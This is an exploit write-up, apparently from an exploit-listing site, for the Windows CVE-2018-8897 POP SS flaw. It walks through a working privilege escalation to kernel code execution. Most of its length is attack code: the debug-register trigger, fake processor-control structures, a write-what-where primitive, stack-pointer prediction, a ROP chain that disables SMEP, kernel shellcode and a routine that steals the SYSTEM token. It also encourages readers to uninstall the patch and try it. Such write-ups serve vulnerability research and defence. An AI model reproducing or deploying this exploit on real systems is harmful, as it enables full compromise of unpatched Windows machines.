Arbitrary Code Execution at Ring 0 using CVE-2018-8897

Authors: Can Bölük           Risk: High

CVE: CVE-2018-8897           0day: Arbitrary Code Execution

0day-id: 0DAY-176182         Date: 2018-05-15


Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privileges.

For this demo to work, KVA Shadowing should be disabled and the relevant security update should be uninstalled.
It may not work under certain hypervisors (such as VMware), which discard the pending #DB after INT3.

0x0: Setting Up the Basics

The fundamentals of this exploit are really simple, unlike its exploitation. When the stack segment is changed, whether via MOV or POP, interrupts are deferred until the next instruction completes. This is not a microcode bug but rather a feature added by Intel so that the stack segment and the stack pointer can be set together without an interrupt arriving in between.

However, many OS vendors missed this detail, which lets us, from user mode, raise a #DB exception that appears to come from CPL0.

We can create a deferred-to-CPL0 exception by setting the debug registers so that a #DB is raised during the execution of the stack-segment-changing instruction, and executing int 3 right after it. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised.

As mentioned by everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted.

All of this can be done in a few lines, as shown below:

#include <Windows.h>
#include <iostream>

void main()
{
  static DWORD g_SavedSS = 0;

  __asm
  {
    mov ax, ss
    mov word ptr [ g_SavedSS ], ax
  }

  CONTEXT Ctx = { 0 };
  Ctx.Dr0 = ( DWORD ) &g_SavedSS;
  Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 );
  SetThreadContext( HANDLE( -2 ), &Ctx );

  PVOID FakeGsBase = ...;

  __asm
  {
    mov eax, FakeGsBase                     ; Set eax to fake gs base
    push 0x23
    push X64_End
    push 0x33
    push X64_Start
    __emit 0xf3                             ; wrgsbase eax
    __emit 0x0f
    __emit 0xae
    __emit 0xd8
    ; Vulnerability
    mov ss, word ptr [ g_SavedSS ]          ; Defer debug exception
    int 3                                   ; Execute with interrupts disabled
  }
}

This example is 32-bit for the sake of showing ASM and C together; the final working code will be 64-bit.
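The Dr7 constant in the snippet packs three fields for breakpoint 0. As a minimal sketch of that encoding, assuming the DR7 layout documented in the Intel SDM (local-enable bit at 2n, R/W field at bit 16+4n, LEN field at bit 18+4n), the helper below rebuilds the same value. `MakeDr7` is a hypothetical name used for illustration only and is not part of the original code.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper (not from the original exploit): builds the DR7 bits
// for hardware breakpoint `Index` (0-3).
//   Rw:  0b00 = execute, 0b01 = write, 0b11 = read/write
//   Len: 0b00 = 1 byte,  0b01 = 2 bytes, 0b11 = 4 bytes
constexpr std::uint32_t MakeDr7( unsigned Index, std::uint32_t Rw, std::uint32_t Len )
{
  return ( 1u  << ( Index * 2 ) )        // Ln:   local enable
       | ( Rw  << ( 16 + Index * 4 ) )   // R/Wn: access type
       | ( Len << ( 18 + Index * 4 ) );  // LENn: access width
}

// Same value as Ctx.Dr7 in the snippet: DR0, read/write, 4 bytes wide.
static_assert( MakeDr7( 0, 0b11, 0b11 ) ==
               ( ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 ) ),
               "matches the literal expression used for Ctx.Dr7" );
```

A read/write breakpoint is what makes the load in `mov ss, word ptr [ g_SavedSS ]` trigger the #DB.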

Now let’s start debugging. We are in KiDebugTrapOrFault with our custom GSBASE! However, the result is nothing but catastrophic: almost no function works, and we end up in an infinite KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… loop. If we had a perfectly valid GSBASE, the outcome of what we have achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE behave like the real one and try to get to KeBugCheckEx.

We can utilize a small IDA script to step to relevant parts faster:

#include <idc.idc>
static main() 
{
  Message( "--- Step Till Next GS ---\n" );
  while( 1 )
  {
    auto Disasm = GetDisasmEx( GetEventEa(), 1 );
    if ( strstr( Disasm, "gs:" ) != -1 )   // Stop at the next gs: access
      break;
    StepInto();
    GetDebuggerEvent( WFNE_SUSP, -1 );
  }
}

0x1: Fixing the KPCR Data

Here are the few places where we have to modify the contents at GSBASE to pass through successfully:


MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h

Pcr.Prcb.MxCsr needs to hold a valid combination of flags to pass this instruction, or else it will raise a #GP. So let’s set it to its initial value, 0x1F80.
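To make the 0x1F80 value less magical: it is the power-on MXCSR default, with all six SIMD exception mask bits (bits 7-12) set and everything else clear. The sketch below decodes it and models the reserved-bit check that makes LDMXCSR fault. The `kAssumedMxcsrMask` value of 0xFFFF is an assumption for illustration; the real mask is reported per CPU by FXSAVE.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint32_t kMxcsrDefault        = 0x1F80;
constexpr std::uint32_t kMxcsrExceptionMasks = 0x3Fu << 7;  // IM, DM, ZM, OM, UM, PM

// Assumption: a typical MXCSR_MASK; the real value comes from FXSAVE.
constexpr std::uint32_t kAssumedMxcsrMask = 0xFFFF;

// Simplified model: LDMXCSR raises #GP when any reserved bit is set.
constexpr bool LdmxcsrWouldFault( std::uint32_t Value,
                                  std::uint32_t MxcsrMask = kAssumedMxcsrMask )
{
  return ( Value & ~MxcsrMask ) != 0;
}

static_assert( kMxcsrDefault == kMxcsrExceptionMasks,
               "0x1F80 is exactly the six exception-mask bits" );
```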


MEMORY:FFFFF8018C20DB5F mov     rax, gs:188h
MEMORY:FFFFF8018C20DB68 bt      dword ptr [rax+74h], 8

Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h.


MEMORY:FFFFF8018C12A4D8 mov     rax, gs:qword_188
MEMORY:FFFFF8018C12A4E1 mov     rax, [rax+0B8h]

This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it.

MEMORY:FFFFF8018C12A0AC mov     rax, gs:qword_20
MEMORY:FFFFF8018C12A0B5 mov     ecx, [rax+148h]

0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while we are at it.


This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if that call fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack and Pcr.Prcb.IsrStack, and if it doesn’t find a match it reports failure. We obviously cannot know the value of the kernel stack pointer from user mode, so what can we do?

There’s a weird check in the middle of the function:

char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3)
{
  if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) )
    ...
  else
  {
    *v5 = 5;
    result = 1;
    *v3 = 0xFFFFFFFFFFFFFFFFi64;
    *v4 = 0xFFFF800000000000i64;
  }
  return result;
}

Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h), KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved.

After these changes, RtlDispatchException will fail without bugchecking and return to KiDispatchException.
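The effect of that check can be modelled in a few lines. This is only a sketch of the single branch discussed here, not a reimplementation of the kernel routine. `QueryStackModel` and `StackInfo` are hypothetical names, and the "equal" path is collapsed into a plain failure as a simplifying assumption (the real function goes on to compare RSP against the known stacks).

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical result type for the model.
struct StackInfo
{
  bool          Ok;
  std::uint32_t Type;
  std::uint64_t Low;
  std::uint64_t High;
};

// Models only the comparison of KThread.InitialStack against Prcb.RspBase.
constexpr StackInfo QueryStackModel( std::uint64_t InitialStack, std::uint64_t RspBase )
{
  return ( InitialStack == RspBase )
       ? StackInfo{ false, 0, 0, 0 }  // assumption: stands in for the real RSP checks
       : StackInfo{ true, 5, 0xFFFF800000000000ull, 0xFFFFFFFFFFFFFFFFull };
}
```

With InitialStack = 0 and RspBase = 1, as chosen in the text, the model takes the second path and reports the whole kernel half of the address space as the stack range.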


We are finally here. Here’s the last thing we need to fix:

MEMORY:FFFFF8018C1FB94A mov     rcx, gs:qword_20
MEMORY:FFFFF8018C1FB953 mov     rcx, [rcx+62C0h]
MEMORY:FFFFF8018C1FB95A call    RtlCaptureContext

Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller, and for some weird reason it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr, so let’s just set it to Pcr + 0x3000 for the sake of having a valid pointer for now.
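The fix-ups from this section can be summarised as a handful of writes into plain buffers. The sketch below only illustrates the layout: it fills ordinary heap memory and does nothing else. All offsets are the ones quoted in the listings above for the author's build and should be treated as assumptions for any other build. `FakePcr`, `Put`, `Get`, `AddrOf` and `BuildFakePcr` are hypothetical names, and Pcr.Self is left out because its offset is not given in the text.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Offsets as quoted in the text; build-specific, so assumptions elsewhere.
constexpr std::size_t kPcrCurrentPrcb     = 0x20;    // gs:20h
constexpr std::size_t kPcrPrcb            = 0x180;   // Pcr.Prcb
constexpr std::size_t kPrcbMxCsr          = 0x0;     // gs:180h
constexpr std::size_t kPrcbCurrentThread  = 0x8;     // gs:188h
constexpr std::size_t kPrcbRspBase        = 0x28;    // gs:1A8h
constexpr std::size_t kPrcbContext        = 0x62C0;  // Prcb.Context (a PCONTEXT)
constexpr std::size_t kThreadInitialStack = 0x28;
constexpr std::size_t kThreadProcess      = 0xB8;

// Hypothetical container for the three zero-filled allocations.
struct FakePcr
{
  std::vector<std::uint8_t> Pcr     = std::vector<std::uint8_t>( 0x10000 );
  std::vector<std::uint8_t> Thread  = std::vector<std::uint8_t>( 0x1000 );
  std::vector<std::uint8_t> Process = std::vector<std::uint8_t>( 0x1000 );
};

template <typename T>
void Put( std::vector<std::uint8_t>& Buf, std::size_t Off, T Value )
{
  std::memcpy( Buf.data() + Off, &Value, sizeof( Value ) );
}

template <typename T>
T Get( const std::vector<std::uint8_t>& Buf, std::size_t Off )
{
  T Value;
  std::memcpy( &Value, Buf.data() + Off, sizeof( Value ) );
  return Value;
}

inline std::uint64_t AddrOf( const std::vector<std::uint8_t>& Buf, std::size_t Off = 0 )
{
  return reinterpret_cast<std::uintptr_t>( Buf.data() + Off );
}

inline FakePcr BuildFakePcr()
{
  FakePcr F;
  Put<std::uint32_t>( F.Pcr, kPcrPrcb + kPrcbMxCsr, 0x1F80 );                     // valid MXCSR
  Put<std::uint64_t>( F.Pcr, kPcrPrcb + kPrcbCurrentThread, AddrOf( F.Thread ) ); // CurrentThread
  Put<std::uint64_t>( F.Thread, kThreadProcess, AddrOf( F.Process ) );            // ApcState.Process
  Put<std::uint64_t>( F.Pcr, kPcrCurrentPrcb, AddrOf( F.Pcr, kPcrPrcb ) );        // CurrentPrcb
  Put<std::uint64_t>( F.Pcr, kPcrPrcb + kPrcbRspBase, 1 );                        // RspBase = 1
  Put<std::uint64_t>( F.Thread, kThreadInitialStack, 0 );                         // InitialStack = 0
  Put<std::uint64_t>( F.Pcr, kPcrPrcb + kPrcbContext, AddrOf( F.Pcr, 0x3000 ) );  // Context pointer
  return F;
}
```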

0x2: Write|What|Where

And there we go, sweet sweet blue screen of victory!

Now that everything works, how can we exploit it?

The code after KeBugCheckEx is too complex to step through one instruction at a time, and a bugcheck is most likely not-so-fun to recover from, so let’s try NOT to bugcheck this time.

I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls through registers and [register+x]) and made it step until KeBugCheckEx is hit:

#include <idc.idc>
static main() 
{
  Message( "--- Logging Points of Interest ---\n" );
  while( 1 )
  {
    auto IP = GetEventEa();
    auto Disasm = GetDisasmEx( IP, 1 );

    if (
      ( strstr( Disasm, "gs:" ) != -1 ) ||
      ( strstr( Disasm, "jmp r" ) != -1 ) ||
      ( strstr( Disasm, "call r" ) != -1 ) ||
      ( strstr( Disasm, "jmp" ) != -1 && strstr( Disasm, "[r" ) != -1 ) ||
      ( strstr( Disasm, "call" ) != -1 && strstr( Disasm, "[r" ) != -1 )
    )
      Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm );

    StepInto();
    GetDebuggerEvent( WFNE_SUSP, -1 );

    if( IP == ... )
      break;
  }
}

To my disappointment, there are no convenient jumps or calls. The whole output is:

- KiDebugTrapOrFault (+3d):                   test    word ptr gs:278h, 40h
- sub_FFFFF8018C207019 (+5):                  ldmxcsr dword ptr gs:180h
-- KiExceptionDispatch (+5f):                 mov     rax, gs:188h
--- KiDispatchException (+48):                mov     rax, gs:188h
--- KiDispatchException (+5c):                inc     gs:5D30h
---- KeCopyLastBranchInformation (+38):       mov     rax, gs:20h
---- KeQueryCurrentStackInformation (+3b):    mov     rax, gs:188h
---- KeQueryCurrentStackInformation (+44):    mov     rcx, gs:1A8h
--- KeBugCheckEx (+1a):                       mov     rcx, gs:20h

This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it.

I was originally going to make it write over g_CiOptions and continuously call NtLoadDriver from another thread, but this idea did not work as well as I thought: the current thread is stuck in an infinite loop, and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses. (That being said, apparently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.)


After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext.

How are we going to overwrite the return address without having access to RSP? With a little bit of creativity, we actually can get access to RSP. We can get the current RSP by making Prcb.Context point to user-mode memory and polling the Context.Rsp value from a secondary thread. Sadly, this is not useful by itself, as by then we have already passed RtlCaptureContext (our write-what-where primitive).

However, if we could return to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable, which is exactly what we are going to do.

To return to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made.

.text:000000014017595F                 mov     rcx, gs:20h
.text:0000000140175968                 add     rcx, 100h
.text:000000014017596F                 call    KiSaveProcessorControlState
.text:0000000140175C80 KiSaveProcessorControlState proc near   ; CODE XREF: KeBugCheckEx+3Fp
.text:0000000140175C80                                         ; KeSaveStateForHibernate+ECp ...
.text:0000000140175C80                 mov     rax, cr0
.text:0000000140175C83                 mov     [rcx], rax
.text:0000000140175C86                 mov     rax, cr2
.text:0000000140175C89                 mov     [rcx+8], rax
.text:0000000140175C8D                 mov     rax, cr3
.text:0000000140175C90                 mov     [rcx+10h], rax
.text:0000000140175C94                 mov     rax, cr4
.text:0000000140175C97                 mov     [rcx+18h], rax
.text:0000000140175C9B                 mov     rax, cr8
.text:0000000140175C9F                 mov     [rcx+0A0h], rax

We will set DR1 on gs:20h + 0x100 + 0xA0, the slot that receives CR8, so that KeBugCheckEx traps back into KiDebugTrapOrFault right after the value of CR4 has been saved.

To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once, giving our user-mode thread an initial RSP value, and then let it execute another time to get the new RSP, from which we can calculate the per-execution RSP difference. This RSP delta will be constant because the control flow is also constant.

Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from it to get the location of RtlCaptureContext’s return pointer, and position Prcb.Context so that Xmm13 through Xmm15 are written over it.

Thread logic will be like the following:

volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );
while ( !Ctx->Rsp );                                      // Wait for RtlCaptureContext to be called once so we get leaked RSP
uint64_t StackInitial = Ctx->Rsp;
while ( Ctx->Rsp == StackInitial );                       // Wait for it to be called another time so we get the stack pointer difference 
                                                          // between sequential KiDebugTrapOrFault
StackDelta = Ctx->Rsp - StackInitial;
PredictedNextRsp = Ctx->Rsp + StackDelta;                 // Predict next RSP value when RtlCaptureContext is called
uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8;      // Predict where the return pointer will be located at
NextRetPtrStorage &= ~0xF;
*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13;  
                                                          // Make RtlCaptureContext write XMM13-XMM15 over it

Now we simply need to set up a ROP chain and write it to XMM13-XMM15. Because of the mask we apply to comply with the movaps alignment requirement, we cannot predict which half of XMM13 (the lowest of the three slots) the return pointer will land on, so the first two pointers should simply point at a [RETN] instruction.

We need to load a register with a value of our choosing in order to set CR4, so XMM14 will hold a pointer to a [POP RCX; RETN] gadget followed by a valid CR4 value with SMEP disabled. As for XMM15, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode.
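The prediction and the alignment ambiguity are pure arithmetic, so they can be checked in isolation. The sketch below mirrors the steps of the thread logic (delta, predicted RSP, return slot, 16-byte mask) on plain integers. `PredictReturnSlot` and `Prediction` are hypothetical names, and the sample values in the note after the block are made up for illustration.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical result type: where the return pointer is expected to live and
// where the 16-byte aligned write will actually start.
struct Prediction
{
  std::uint64_t RetSlot;        // predicted address of the return pointer
  std::uint64_t AlignedSlot;    // RetSlot rounded down to 16 bytes
  bool          HitsUpperHalf;  // true if RetSlot is the upper 8 bytes of the slot
};

constexpr Prediction PredictReturnSlot( std::uint64_t RspFirst, std::uint64_t RspSecond )
{
  // Unsigned wrap-around keeps this correct when the stack grows downwards.
  const std::uint64_t Delta   = RspSecond - RspFirst;
  const std::uint64_t NextRsp = RspSecond + Delta;
  const std::uint64_t RetSlot = NextRsp - 0x8;
  const std::uint64_t Aligned = RetSlot & ~0xFull;
  return Prediction{ RetSlot, Aligned, RetSlot != Aligned };
}
```

For example, with leaked values 0x1000 and 0x0E00 the predicted return slot is 0x0BF8, which is the upper half of the aligned slot at 0x0BF0. With 0x1008 and 0x0E08 it is exactly the aligned slot at 0x0C00. Since either case can occur, both halves of the first slot carry the same [RETN] pointer.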

The final chain will look something like:

-- &retn;                (fffff80372e9502d)
-- &retn;                (fffff80372e9502d)
-- &pop rcx; retn;       (fffff80372ed9122)
-- cr4_nosmep            (00000000000506f8)
-- &mov cr4, rcx; retn;  (fffff803730045c7)
-- &KernelShellcode      (00007ff613fb1010)
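The cr4_nosmep value in the chain is an ordinary CR4 value with the SMEP bit (bit 20) cleared. As a small sketch of that bit manipulation: `DisableSmep` is a hypothetical helper, and the 0x1506F8 input is an assumed "original" value obtained simply by setting bit 20 on the value shown in the chain.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint64_t kCr4Smep = 1ull << 20;  // CR4.SMEP

// Hypothetical helper: returns the CR4 value with SMEP cleared.
constexpr std::uint64_t DisableSmep( std::uint64_t Cr4 )
{
  return Cr4 & ~kCr4Smep;
}

// Assumed original value 0x1506F8 maps to the 0x506F8 used in the chain.
static_assert( DisableSmep( 0x1506F8 ) == 0x506F8, "bit 20 cleared" );
```

This is the same mask the shellcode applies with `Cr4Old & ~( 1 << 20 )`.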

In our shellcode, we will need to restore the CR4 value, swapgs, roll back the ISR stack, execute the code we want and IRETQ back to user mode, which can be done as shown below:

NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;

using fnIRetToVulnStub = void( * )  ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );
NON_PAGED_DATA uint8_t IRetToVulnStub[] =
{
  0x0F, 0x22, 0xE1,    // mov cr4, rcx ; cr4 = original cr4
  0x48, 0x89, 0xD4,    // mov rsp, rdx ; stack = isr stack
  0x4C, 0x89, 0xC1,    // mov rcx, r8  ; rcx = ContextBackup
  0xFB,                // sti          ; enable interrupts
  0x48, 0xCF           // iretq        ; interrupt return
};

NON_PAGED_CODE void KernelShellcode()
{
  __writedr( 7, 0 );

  uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
  __writecr4( Cr4Old & ~( 1 << 20 ) );

  uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;
  __writedr( 2, StackDelta );
  __writedr( 3, IsrStackIterator );

  // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiDebugTrapOrFault
  while ( 
    ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
    ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
  {
    __rollback_isr( IsrStackIterator );

    // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
    if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
    {
      /*
      fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
      fffff00e`d7a1bc40 0000000000000010 
      fffff00e`d7a1bc48 0000000000000002 
      fffff00e`d7a1bc50 fffff00ed7a1bc68 
      fffff00e`d7a1bc58 0000000000000000 
      fffff00e`d7a1bc60 0000000000000014 
      fffff00e`d7a1bc68 00007ff7e2261e95 --
      fffff00e`d7a1bc70 0000000000000033 
      fffff00e`d7a1bc78 0000000000000202 
      fffff00e`d7a1bc80 000000ad39b6f938 
      */
      IsrStackIterator = IsrStackIterator + 0x30;
    }

    IsrStackIterator -= StackDelta;
  }

  PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) );
  Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );

  // ------ KERNEL CODE ------
  // ------ KERNEL CODE ------

  ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
  ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );
}

We can’t restore any registers, so we will make the thread responsible for triggering the vulnerability store its context in a global container and restore from that instead. Now that we have executed our code and returned to user mode, our exploit is complete!

Let’s make a simple demo stealing the System token:

uint64_t SystemProcess = *k_PsInitialSystemProcess;
uint64_t CurrentProcess = k_PsGetCurrentProcess();

uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );

// Scan the process object for the token pointer and swap it
for ( int i = 0; i < 0x500; i+= 0x8 )
{
  uint64_t Val = *( uint64_t * ) ( CurrentProcess + i );
  Val &= ~0xF;                           // Ignore the low 4 bits of the stored value
  if ( Val == CurrentToken )
  {
    *( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
  }
}

k_PsDereferencePrimaryToken( CurrentToken );
k_PsDereferencePrimaryToken( SystemToken );
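The `Val &= ~0xF` step is needed because the token field is stored as an EX_FAST_REF: on x64 the low 4 bits of the stored value hold a small reference count, and only the remaining bits are the object pointer. A minimal sketch of that split is shown here. The helper names are hypothetical, and the sample value in the note after the block is made up.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint64_t kFastRefMask = 0xF;  // low 4 bits: cached reference count

// Hypothetical helpers that split an EX_FAST_REF-style value.
constexpr std::uint64_t FastRefObject( std::uint64_t Value )
{
  return Value & ~kFastRefMask;
}

constexpr std::uint64_t FastRefCount( std::uint64_t Value )
{
  return Value & kFastRefMask;
}
```

For a stored value such as 0xFFFFA50F1234567C, the object pointer is 0xFFFFA50F12345670 and the cached count is 0xC, which is why the loop compares the masked value against the pointer returned by k_PsReferencePrimaryToken.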

Complete implementation of the concept can be found at:



P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try!

P.P.S.: Before you ask why I don’t use intrinsics to read/write GSBASE, it is because MSVC generates invalid code:
